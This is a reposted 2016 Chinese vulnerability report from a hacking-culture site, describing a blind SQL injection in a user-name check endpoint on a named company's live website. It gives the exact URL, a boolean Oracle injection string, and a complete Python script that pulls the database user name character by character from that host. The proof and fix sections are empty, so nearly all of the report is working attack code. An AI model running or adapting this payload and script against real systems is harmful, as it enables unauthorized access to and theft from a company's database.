记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

宜搜科技某处sql注入漏洞(附脚本)

2016-04-27 23:30

code 区域
http://www.appeasou.com/jsp/static/join/user!checkUserName.action 





username=-1' OR length(SYS_CONTEXT('USERENV','CURRENT_USER'))=3 or 'Q'='

为真时,显示true:

4.png

为假时为空白:

5.png

USER长度为3:

6.png

code 区域
#encoding=utf-8



import httplib



import time



import string



import sys

import re



import random



import urllib







headers = {



'Content-Type': 'application/x-www-form-urlencoded',

}







payloads = list(string.ascii_lowercase)



payloads += list(string.ascii_uppercase)



for i in range(0,10):



payloads.append(str(i))









print 'start to retrive Oracle user:'



user = ''



for i in range(1,4,1):



for payload in payloads:



conn = httplib.HTTPConnection('www.appeasou.com', timeout=60)



params = {



'username': "-1' OR ascii(substr(SYS_CONTEXT('USERENV','CURRENT_USER'),%s,1))=%s or 'B'='" % (i, ord(payload)),



}



conn.request(method='POST',



url='/jsp/static/join/user!checkUserName.action',



body = urllib.urlencode(params),



headers = headers)



start_time = time.time()



html_doc = conn.getresponse().read()



#print html_doc



conn.close()



print '.',



if re.search('true',html_doc) > 0: # true



user += payload



print '\n[in progress]', user



break







print '\nOracle user is', user

漏洞证明:

修复方案:

知识来源: www.wooyun.org/bugs/wooyun-2016-0199082

阅读:107064 | 评论:0 | 标签:注入 漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“宜搜科技某处sql注入漏洞(附脚本)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云

本页关键词